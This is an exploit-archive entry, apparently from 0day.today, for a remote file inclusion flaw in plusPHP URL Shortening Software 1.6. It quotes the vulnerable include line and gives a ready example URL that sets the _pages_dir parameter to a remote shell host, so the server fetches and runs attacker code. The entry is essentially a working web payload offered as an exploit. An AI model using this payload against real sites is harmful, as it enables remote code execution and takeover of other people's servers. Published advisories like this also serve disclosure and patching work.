plusPHP URL Shortening Software 1.6 Remote File Inclusion Vulnerability

2008-05-25T00:00:00
ID 1337DAY-ID-3067
Type zdt
Reporter DR.TOXIC
Modified 2008-05-25T00:00:00

Description

Exploit for unknown platform in category web applications

                                        
                                            =======================================================================
plusPHP URL Shortening Software 1.6 Remote File Inclusion Vulnerability
=======================================================================



Title: plusPHP Multi-User Short URL and Statistics (plus.php) RFI Vulnerability
Vulnerability Code: (plus.php) "include ($_pages_dir.'_config.php');"
Example;
http://localhost/plus.php?_pages_dir=http://SH3LL?




#  0day.today [2018-01-26]  #